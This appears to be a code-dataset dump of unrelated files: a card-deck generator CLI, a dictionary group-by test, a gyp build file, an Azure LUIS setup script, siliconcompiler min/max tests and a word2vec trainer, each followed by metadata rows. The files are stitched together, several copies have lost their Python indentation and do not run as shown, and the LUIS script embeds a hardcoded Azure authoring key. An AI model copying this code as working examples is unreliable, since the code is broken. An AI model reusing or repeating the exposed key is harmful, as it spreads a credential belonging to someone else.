    ``argparse.ArgumentTypeError`` so argparse prints a clean rejection
    message like ``error: argument input: x does not exist``.
    """
    if os.path.exists(x):
        return x
    # ArgumentTypeError lets argparse format the rejection message itself.
    raise argparse.ArgumentTypeError("{0} does not exist".format(x))
##### CLI args #####
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()
handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
deck_name = os.path.basename(deck_file)[:-4]
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
reader = csv.reader(csvFile)
list_copy.append(reader.__next__())
for row in reader:
list_copy.append(row)
nameList = nameList + [row[1]] * int(row[0])
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]
if not os.path.exists('decks'):
os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
os.mkdir(os.path.join('decks',deck_name))
for page_number in range(len(pageList)):
print(f'Page {page_number}:')
page = pageList[page_number]
surf = layout.getSurface()
ctx = cairo.Context(surf)
for i in range(len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
print(cardPos)
print(card)
mat = layout.getMatrix(*cardPos, surf)
ctx.set_matrix(mat)
drawCard(card, ctx)
surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
from add_images import BaseImage
from add_images import addImage
from add_images import processImage
from PIL import Image
if (modify_layout is not None):
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
temp = baseImage.baseImage.convert('RGBA')
data = np.array(temp)
red, green, blue, alpha = data.T
for i in range(0,63):
white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
baseImage.update(Image.fromarray(data))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
#import pdb;pdb.set_trace()
if (handle_images):
if not os.path.exists(os.path.join('decks',deck_name,'images')):
os.mkdir(os.path.join('decks',deck_name,'images'))
#open the previous png to add the images
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
for i in range (len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
processImage(card,deck_name)
baseImage.update(addImage(card,baseImage,deck_name, cardPos))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
filewriter = csv.writer(deck_copy)
for element in list_copy:
filewriter.writerow(element)
| 33.178862 | 143 | 0.668464 | #! /usr/bin/env python3
import csv
import json
import os
import pathlib
import sys
import numpy as np
import cairo
import argparse
import layout
from draw_card import drawCard
from card_model import CardModel
from card_model import CardDeck
def extant_file(x):
"""
'Type' for argparse - checks that file exists but does not open.
"""
if not os.path.exists(x):
# Argparse uses the ArgumentTypeError to give a rejection message like:
# error: argument input: x does not exist
raise argparse.ArgumentTypeError("{0} does not exist".format(x))
return x
##### CLI args #####
parser = argparse.ArgumentParser(description="Deck Generator for Game Designers")
parser.add_argument('-d', '--deck', type=extant_file, help='csv file containing the deck', metavar="FILE", required=True)
parser.add_argument('-c', '--cards', type=extant_file, help='json file containing cards description', metavar="FILE", required=True)
parser.add_argument('-i', '--images', help='Add images to cards', action='store_true')
parser.add_argument('-r', '--rgb', help='Update layout card border colour with given R,G,B, only works with default layout', nargs=3, type=int)
parser.add_argument('-l', '--layout', help='Use a different layout than default', type=extant_file, metavar="FILE")
args = parser.parse_args()
handle_images = args.images
modify_layout = args.rgb
deck_file = args.deck
cards_file = args.cards
#deck_file = './example_deck.csv'
deck_name = os.path.basename(deck_file)[:-4]
nameList = []
list_copy = []
with open(deck_file, encoding='utf-8') as csvFile:
reader = csv.reader(csvFile)
list_copy.append(reader.__next__())
for row in reader:
list_copy.append(row)
nameList = nameList + [row[1]] * int(row[0])
cards = CardDeck(cards_file)
cardList = [CardModel(name,cards.getDb()) for name in nameList]
pageList = [cardList[i:i+9] for i in range(0, len(cardList), 9)]
if not os.path.exists('decks'):
os.mkdir('decks')
if not os.path.exists(os.path.join('decks',deck_name)):
os.mkdir(os.path.join('decks',deck_name))
for page_number in range(len(pageList)):
print(f'Page {page_number}:')
page = pageList[page_number]
surf = layout.getSurface()
ctx = cairo.Context(surf)
for i in range(len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
print(cardPos)
print(card)
mat = layout.getMatrix(*cardPos, surf)
ctx.set_matrix(mat)
drawCard(card, ctx)
surf.write_to_png(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
from add_images import BaseImage
from add_images import addImage
from add_images import processImage
from PIL import Image
if (modify_layout is not None):
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
temp = baseImage.baseImage.convert('RGBA')
data = np.array(temp)
red, green, blue, alpha = data.T
for i in range(0,63):
white_areas = (red == 190+i) & (blue == 190+i) & (green == 190+i)
data[..., :-1][white_areas.T] = (modify_layout[0], modify_layout[1], modify_layout[2])
baseImage.update(Image.fromarray(data))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
#import pdb;pdb.set_trace()
if (handle_images):
if not os.path.exists(os.path.join('decks',deck_name,'images')):
os.mkdir(os.path.join('decks',deck_name,'images'))
#open the previous png to add the images
baseImage = BaseImage(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
for i in range (len(page)):
card = page[i]
cardPos = (i % 3, i // 3)
processImage(card,deck_name)
baseImage.update(addImage(card,baseImage,deck_name, cardPos))
baseImage.save(f'decks/{deck_name}/{deck_name}_p{page_number}.png')
with open(f'decks/{deck_name}/{deck_name}.csv', 'w') as deck_copy:
filewriter = csv.writer(deck_copy)
for element in list_copy:
filewriter.writerow(element)
| 0 | 0 | 0 |
059cd05702586a44598f05cc8b421aa9225178a2 | 1,115 | py | Python | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | shmakovpn/tests/group_by/test_group_by_extended_dict.py | shmakovpn/shmakovpn_tools | 85090c9489b0b9fa13b6c42c91459efe9b966a3b | [
"Apache-2.0"
] | null | null | null | import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
    """Tests grouping records with **reduce** over an **ExtendedDict** accumulator."""

    # Sample records to be grouped by their 'name' field.
    data: List[Dict[str, Any]] = [
        {'name': 'alex', 'score': 2, },
        {'name': 'john', 'score': 4, },
        {'name': 'dan', 'score': 1, },
        {'name': 'alex', 'score': 6, },
        {'name': 'dan', 'score': 3, },
    ]

    def test_group_by_extended_dict(self):
        """Group scores by name using ``ExtendedDict.return_updated``."""
        grouped = reduce(
            lambda acc, row: acc.return_updated(
                **{row['name']: acc.pop(row['name'], []) + [row['score']]}
            ),
            self.data,
            ExtendedDict(),  # accumulator providing return_updated()
        )
        expected = {
            'john': [4],
            'alex': [2, 6],
            'dan': [1, 3],
        }
        self.assertEqual(grouped, expected)
| 30.135135 | 74 | 0.453812 | import unittest
from shmakovpn.extend_builtins import ExtendedDict
from functools import reduce
from typing import List, Dict, Any
class TestGroupByExtendedDict(unittest.TestCase):
"""
This class contains tests of **groupby** using **ExtendedDict**
"""
data: List[Dict[str, Any]] = [
{'name': 'alex', 'score': 2, },
{'name': 'john', 'score': 4, },
{'name': 'dan', 'score': 1, },
{'name': 'alex', 'score': 6, },
{'name': 'dan', 'score': 3, },
]
"""the dataset for tests"""
def test_group_by_extended_dict(self):
"""
Test for **groupby** that uses **ExtendedDict**
"""
self.assertEqual(
reduce(
lambda a, b: a.return_updated(
**{b['name']: a.pop(b['name'], []) + [b['score']]}
),
self.data,
ExtendedDict(), # use **ExtendedDict** as an accumulator
), {
'john': [4],
'alex': [2, 6],
'dan': [1, 3],
}
)
| 0 | 0 | 0 |
10688525c6f04116af3dec2bf611c1965388a673 | 926 | gyp | Python | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | OpenGL/app/examples/examples.gyp | legendlee1314/GLmacia | 67ef41c83404ae0346c522b0045454826c30b8bd | [
"MIT"
] | null | null | null | {
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| 19.291667 | 45 | 0.449244 | {
'variables': {
'project_name': 'examples',
'current_dir': '<(DEPTH)',
},
'targets': [
{
'target_name': 'basic_sample',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_sample.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'basic_render',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'basic_render.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
{
'target_name': 'simple_texture',
'type': 'executable',
'dependencies': [
'<(current_dir)/src/macia.gyp:macia',
],
'sources': [
'simple_texture.cc',
],
'include_dirs': [
'<(current_dir)',
],
},
],
}
| 0 | 0 | 0 |
95f29f2a630d78c09ee7af58af38a85efc9c3ba3 | 4,287 | py | Python | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | 1 | 2019-10-28T15:33:07.000Z | 2019-10-28T15:33:07.000Z | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | null | null | null | AiComponent/Python/main.py | paychex/fredonia-paychex-ansible | 05fda7c349953144606cf57e6765493a7dbaf356 | [
"Apache-2.0"
] | null | null | null |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials
import datetime, json, os, time
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)
# Instatiating a LUIS client
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
| 44.195876 | 116 | 0.608817 |
from azure.cognitiveservices.language.luis.authoring import LUISAuthoringClient
from msrest.authentication import CognitiveServicesCredentials
import datetime, json, os, time
authoring_key = "bde233f61f5e4e3fa48ff5a11b0f304c"
region = "westus"
endpoint = "https://{}.api.cognitive.microsoft.com".format(region)
# Instatiating a LUIS client
client = LUISAuthoringClient(endpoint, CognitiveServicesCredentials(authoring_key))
def create_app():
    """Create the Fredchex LUIS app and return its ``(app_id, version)`` pair."""
    name = "Fredchex AI"
    description = "Terraform and Ansible assistant for Fredchex project"
    version = "0.1"
    locale = "en-us"
    app_id = client.apps.add({
        'name': name,
        'initial_version_id': version,
        'description': description,
        'culture': locale,
    })
    print("Fredchex AI app {} has been created\n with ID {}".format(name, app_id))
    return app_id, version
def add_intents(app_id, app_version):
    """Register the CreateResource intent on the LUIS app version."""
    intent_id = client.model.add_intent(app_id, app_version, "CreateResource")
    print("Intent CreateResource {} has been added.".format(intent_id))
def add_entities(app_id, app_version):
    """Create the entity hierarchy (category -> type -> count), prebuilts, and composite."""
    category_id = client.model.add_entity(app_id, app_version, "Resource Category")
    print("resourceCategoryEntityId {} has been added.".format(category_id))
    type_id = client.model.create_entity_role(app_id, app_version, category_id, "Resource Type")
    print("resourceTypeId {} has been added.".format(type_id))
    count_id = client.model.create_entity_role(app_id, app_version, type_id, "Number of Resource")
    print("numberOfResource {} has been added.".format(count_id))
    # Prebuilt extractors for key phrases and numbers.
    client.model.add_prebuilt(app_id, app_version, prebuilt_extractor_names=["keyPhrase", "number"])
    composite_id = client.model.add_composite_entity(app_id, app_version, name="Resource",
                                                     children=["Resource Category", "Resource Type", "number", "keyphrase"])
    print("compositeEntityId {} has been added.".format(composite_id))
def add_utterances(app_id, app_version):
    """Batch-upload sample utterances a speaker may provide as input.

    NOTE(review): relies on ``create_utterance`` defined elsewhere in this
    module — confirm its positional signature (intent, text, *entity pairs).
    """
    samples = [
        ("Hey Terraform", "Can you create one virtual machine for me",
         "Terraform", "Virtual Machine", "one"),
        ("Hey Terraform", "Can you create two virtual machine for me",
         "Terraform", "Virtual Machine", "two"),
        ("Hey Ansible", "Can you create one apache server for me",
         "Ansible", "Apache server", "one"),
        ("Hey Ansible", "Can you create one Minecraft server for me",
         "Ansible", "Minecraft server", "one"),
    ]
    utterances = [
        create_utterance(intent, text,
                         ("Resource", resource),
                         ("Resource Type", rtype),
                         ("Number of Resource", count))
        for intent, text, resource, rtype, count in samples
    ]
    client.examples.batch(app_id, app_version, utterances)
    print("{} example utterance(s) has been added.".format(len(utterances)))
def train_app(app_id, app_version):
response = client.train.train_version(app_id, app_version)
waiting = True
while waiting:
info = client.train.get_status(app_id, app_version)
# Method get_status returns a list of training statuses, one for each model.
# Loop through them and make sure all are done.
waiting = any(map(lambda x: "Queued" == x.details.status or "InProgress" == x.details.status, info))
if waiting:
print("Waiting 10 seconds for training to complete...")
time.sleep(10)
| 3,735 | 0 | 115 |
ac906e10a55ee0d9f5ea232d8f09bdca379f1df2 | 4,164 | py | Python | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 424 | 2021-12-04T15:45:12.000Z | 2022-03-31T20:27:55.000Z | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 105 | 2021-12-03T21:25:29.000Z | 2022-03-31T22:36:59.000Z | tests/core/test_minmax.py | siliconcompiler/siliconcompiler | 6aa2b53441608f228bd520b68c0324fc9cf96377 | [
"Apache-2.0"
] | 38 | 2021-12-04T21:26:20.000Z | 2022-03-21T02:39:29.000Z | # Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
##################################
def test_minimum(chip):
'''API test for min/max() methods
'''
flow = chip.get('option', 'flow')
N = len(chip.getkeys('flowgraph', flow , 'syn'))
chip.write_flowgraph('minmax.png')
chip.write_manifest('minmax.json')
steplist = []
for i in range(N):
steplist.append(('syn',str(i)))
(score, winner) = chip.minimum(*steplist)
assert winner[0] + winner[1] == 'syn9'
| 29.118881 | 98 | 0.564601 | # Copyright 2020 Silicon Compiler Authors. All Rights Reserved.
import siliconcompiler
import pytest
@pytest.fixture
def chip():
    """Build a Chip wired with a 3-step 'testflow': import -> 10 parallel syn -> synmin.

    The 10 parallel 'syn' tasks receive synthetic 'cellarea' metrics that
    decrease with index (1042.0 at index 0 down to 1033.0 at index 9), so
    index 9 is the minimum and index 0 the maximum.  Every task also gets a
    'setupwns' goal of 0.0 and a matching 'setupwns' metric of 0.0.
    """
    # Create instance of Chip class
    chip = siliconcompiler.Chip('oh_add')
    # Step sequence of the flow.
    flowpipe = ['import',
                'syn',
                'synmin']
    tools = {
        'import': 'verilator',
        'syn': 'yosys'
    }
    N = 10
    flow = 'testflow'
    chip.set('option', 'flow', flow)
    # Number of parallel indices per step; only 'syn' fans out.
    threads = {
        'import': 1,
        'syn' : N,
        'synmin' : 1
    }
    # Parallel flow for syn
    for i, step in enumerate(flowpipe):
        for index in range(threads[step]):
            if step == "synmin":
                # 'synmin' uses the builtin 'minimum' tool and takes ALL N
                # outputs of the previous step as inputs to its index '0'.
                chip.set('flowgraph', flow, step, str(index), 'tool', 'minimum')
                for j in range(N):
                    chip.add('flowgraph', flow, step, '0', 'input', (flowpipe[i-1],str(j)))
            elif step == 'import':
                # Entry step: no inputs.
                chip.set('flowgraph', flow, step, str(index), 'tool', tools[step])
            else:
                # Each 'syn' index consumes index '0' of the previous step.
                chip.set('flowgraph', flow, step, str(index), 'tool', tools[step])
                chip.set('flowgraph', flow, step, str(index), 'input', (flowpipe[i-1],'0'))
            # Weight used when ranking candidates by metric.
            chip.set('flowgraph', flow, step, str(index), 'weight', 'cellarea', 1.0)
            # Goal that each task must satisfy to be eligible as a winner.
            chip.set('flowgraph', flow, step, str(index), 'goal', 'setupwns', 0.0)
            chip.set('metric', step, str(index), 'setupwns', 0.0)
    # creating fake syn results: decreasing cellarea so index 9 is best (min).
    for index in range(N):
        for metric in chip.getkeys('flowgraph', flow, 'syn', str(index), 'weight'):
            chip.set('metric', 'syn', str(index), metric, 1000-index*1 + 42.0)
    return chip
##################################
def test_minimum(chip):
    '''chip.minimum() should pick the syn index with the lowest weighted score.'''
    flow = chip.get('option', 'flow')
    num_indices = len(chip.getkeys('flowgraph', flow, 'syn'))
    chip.write_flowgraph('minmax.png')
    chip.write_manifest('minmax.json')
    candidates = [('syn', str(i)) for i in range(num_indices)]
    score, winner = chip.minimum(*candidates)
    # Metrics decrease with index, so the last index (9) wins.
    assert winner[0] + winner[1] == 'syn9'
def test_maximum(chip):
    '''chip.maximum() should pick the syn index with the highest weighted score.'''
    flow = chip.get('option', 'flow')
    candidates = [('syn', str(i))
                  for i in range(len(chip.getkeys('flowgraph', flow, 'syn')))]
    score, winner = chip.maximum(*candidates)
    # Metrics decrease with index, so index 0 has the largest value.
    assert winner == ('syn', '0')
def test_all_failed(chip):
    '''When every parallel task has errored, minimum() returns no winner.'''
    flow = chip.get('option', 'flow')
    indices = [str(i) for i in range(len(chip.getkeys('flowgraph', flow, 'syn')))]
    for index in indices:
        chip.set('flowgraph', flow, 'syn', index, 'status', siliconcompiler.TaskStatus.ERROR)
    score, winner = chip.minimum(*[('syn', index) for index in indices])
    assert winner is None
def test_winner_failed(chip):
    '''An errored task is excluded even when it has the best score.'''
    flow = chip.get('option', 'flow')
    # Mark what would otherwise be the winner as failed.
    chip.set('flowgraph', flow, 'syn', '9', 'status', siliconcompiler.TaskStatus.ERROR)
    candidates = [('syn', str(i))
                  for i in range(len(chip.getkeys('flowgraph', flow, 'syn')))]
    score, winner = chip.minimum(*candidates)
    # Winner should be second-best syn8, not the errored syn9.
    assert winner[0] + winner[1] == 'syn8'
def test_winner_fails_goal_negative(chip):
    '''A task whose setupwns metric drops below its 0.0 goal cannot win.'''
    flow = chip.get('option', 'flow')
    chip.set('metric', 'syn', '9', 'setupwns', -1)
    candidates = [('syn', str(i))
                  for i in range(len(chip.getkeys('flowgraph', flow, 'syn')))]
    score, winner = chip.minimum(*candidates)
    # The otherwise-best syn9 misses its goal, so second-best syn8 wins.
    assert winner == ('syn', '8')
def test_winner_fails_goal_positive(chip):
    '''A task exceeding a zero 'errors' goal is disqualified from winning.'''
    flow = chip.get('option', 'flow')
    chip.set('flowgraph', flow, 'syn', '9', 'goal', 'errors', 0)
    chip.set('metric', 'syn', '9', 'errors', 1)
    candidates = [('syn', str(i))
                  for i in range(len(chip.getkeys('flowgraph', flow, 'syn')))]
    score, winner = chip.minimum(*candidates)
    # The otherwise-best syn9 violates its errors goal, so syn8 wins.
    assert winner == ('syn', '8')
| 3,462 | 0 | 137 |
ae23de335349edc7d34e6f29097dd0de8db7fbef | 5,314 | py | Python | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | 2 | 2018-09-19T01:37:31.000Z | 2019-09-22T02:45:09.000Z | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | null | null | null | Code/run.py | codedecde/WordEmbeddings | 84e6cd5424b74da6e889dd1b6ab7a6c5df9432d9 | [
"MIT"
] | null | null | null | import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
"""
Takes in a sequence of words, and returns the indexed data, a list of (word, [2 * window])
:param data: sequence of words
:param word2ix: dictionary mapping words to indexes
:param window_size: Lenght of window
:return indexed_data: List of (word_ix, [2 * window])
"""
indexed_data = []
for ix in xrange(window_size, len(data) - window_size):
word_ix = word2ix[data[ix]]
window = [word2ix[w] for w in data[ix - window_size: ix]] + [word2ix[w] for w in data[ix + 1: ix + window_size + 1]]
indexed_data.append((word_ix, window))
return indexed_data
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
| 34.732026 | 131 | 0.640196 | import torch.utils.data as ut
import torch
import cPickle as cp
import numpy as np
from utils import Progbar, getdata
from model import Word2vec
from torch.autograd import Variable
import torch.optim as optim
from constants import *
use_cuda = torch.cuda.is_available()
data = filter(lambda x: len(x) > 1, open(TEXT).read().split(' '))
word2ix = cp.load(open(VOCAB_FILE))
unigram_table = np.load(UNIGRAM_TABLE_FILE)
data = filter(lambda x: x in word2ix, data)
def add2dict(w1, w2, w_dict, word2ix):
    """Record a symmetric word relation (synonym/antonym pair) in ``w_dict``.

    Both words are mapped through ``word2ix``; pairs containing any
    out-of-vocabulary word are silently skipped.  ``w_dict`` is updated in
    place (index -> set of related indices) and also returned.
    """
    # Skip pairs with out-of-vocabulary words.
    if w1 not in word2ix or w2 not in word2ix:
        return w_dict
    ix1, ix2 = word2ix[w1], word2ix[w2]
    # The relation is symmetric: register it in both directions.
    # setdefault replaces the manual "if key not in dict" initialization.
    w_dict.setdefault(ix1, set()).add(ix2)
    w_dict.setdefault(ix2, set()).add(ix1)
    return w_dict
syn_set = {}
ant_set = {}
with open(PPDB_SYN_FILE) as f:
for line in f:
line = line.strip().split(' ')
syn_set = add2dict(line[0], line[1], syn_set, word2ix)
with open(PPDB_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
with open(WORDNET_ANT_FILE) as f:
for line in f:
line = line.strip().split(' ')
ant_set = add2dict(line[0], line[1], ant_set, word2ix)
# Convert the sets to lists
syn_set = {w: list(syn_set[w]) for w in syn_set}
ant_set = {w: list(ant_set[w]) for w in ant_set}
def generate_data(data, word2ix, window_size):
    """Index a word sequence into (center, context-window) training pairs.

    :param data: sequence of words (each must be a key of ``word2ix``)
    :param word2ix: dictionary mapping words to integer indexes
    :param window_size: number of context words taken on each side
    :return: list of ``(word_ix, [2 * window_size context indexes])``;
        empty when ``data`` is shorter than ``2 * window_size + 1``
    """
    indexed_data = []
    # range (not py2-only xrange) keeps this portable to Python 3; only
    # centers with a full window on both sides are used.
    for ix in range(window_size, len(data) - window_size):
        word_ix = word2ix[data[ix]]
        context = ([word2ix[w] for w in data[ix - window_size:ix]]
                   + [word2ix[w] for w in data[ix + 1:ix + window_size + 1]])
        indexed_data.append((word_ix, context))
    return indexed_data
class DataIterator(ut.Dataset):
    """Map-style Dataset producing word2vec training samples.

    Each item pairs a center word with its context window, ``neg_samples``
    negative indices sampled from the unigram table, and ``n_syn``/``n_ant``
    synonym/antonym indices.  Words without synonyms (or antonyms) get
    index-0 padding plus a 0.0 mask so the loss can ignore them.
    """

    def __init__(self, unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant):
        """Store the sampling tables; ``unigram_table`` is cast to int indices."""
        self.indexed_data = indexed_data
        self.unigram_table = unigram_table.astype(int)
        self.neg_samples = neg_samples
        self.syn_set = syn_set
        self.ant_set = ant_set
        self.n_syn = n_syn
        self.n_ant = n_ant

    def __len__(self):
        return len(self.indexed_data)

    def __getitem__(self, idx):
        """Return (word, context, negatives, synonyms, syn_mask, antonyms, ant_mask)."""
        w_ix, p_ix = self.indexed_data[idx]
        # Negative samples drawn from the (frequency-weighted) unigram table.
        n_ix = np.random.choice(self.unigram_table, replace=True, size=self.neg_samples)
        if w_ix in self.syn_set:
            syn_ix = np.random.choice(self.syn_set[w_ix], replace=True, size=self.n_syn)
            ms_ix = 1
        else:
            # [0] * n works on both Python 2 and 3; the original used
            # py2-only xrange here.  0 is a padding token.
            syn_ix = [0] * self.n_syn
            ms_ix = 0
        if w_ix in self.ant_set:
            ant_ix = np.random.choice(self.ant_set[w_ix], replace=True, size=self.n_ant)
            ma_ix = 1
        else:
            ant_ix = [0] * self.n_ant
            ma_ix = 0
        return (torch.LongTensor([w_ix]),
                torch.LongTensor(p_ix),
                torch.LongTensor(n_ix),
                torch.LongTensor(syn_ix),
                torch.FloatTensor([ms_ix]),
                torch.LongTensor(ant_ix),
                torch.FloatTensor([ma_ix]))
window = 4
neg_samples = 25
n_syn = 4
n_ant = 4
indexed_data = generate_data(data, word2ix, window)
iterator = DataIterator(unigram_table, indexed_data, neg_samples, syn_set, ant_set, n_syn, n_ant)
BATCH_SIZE = 128
dataloader = ut.DataLoader(iterator, batch_size=BATCH_SIZE,
shuffle=True, num_workers=0)
N_EPOCHS = 5
# lr = 0.001
lr = 0.025
bar = Progbar(N_EPOCHS)
w2v = Word2vec(len(word2ix), 300, sparse=False)
optimizer = optim.Adagrad(w2v.parameters(), lr=lr)
words_processed = 0.
for epoch in xrange(N_EPOCHS):
n_batches = len(iterator) // BATCH_SIZE if len(iterator) % BATCH_SIZE == 0 else (len(iterator) // BATCH_SIZE) + 1
bar = Progbar(n_batches)
print "\nEpoch (%d/ %d)\n" % (epoch + 1, N_EPOCHS)
for ix, batch in enumerate(dataloader):
batch = map(lambda x: Variable(x), batch)
if use_cuda:
batch = map(lambda x: x.cuda(), batch)
loss, p_score, n_score, s_score, a_score = w2v(*batch)
loss.backward()
optimizer.step()
optimizer.zero_grad()
# Update the lr
words_processed += BATCH_SIZE
new_lr = lr * max(1e-4, 1. - (words_processed / (len(iterator) * N_EPOCHS)))
for param_groups in optimizer.param_groups:
param_groups['lr'] = new_lr
loss, p_score, n_score, s_score, a_score = map(lambda x: getdata(x).numpy()[0], [loss, p_score, n_score, s_score, a_score])
bar.update(ix + 1, values=[('l', loss), ('p', p_score), ('n', n_score), ('s', s_score), ('a', a_score), ('lr', new_lr)])
weights = w2v.embedding_i.weight
weights = weights.cpu() if use_cuda else weights
weights = weights.data.numpy()
save_file = BASE_DIR + "Models/vocab_matrix_with_syn_ant.npy"
np.save(save_file, weights)
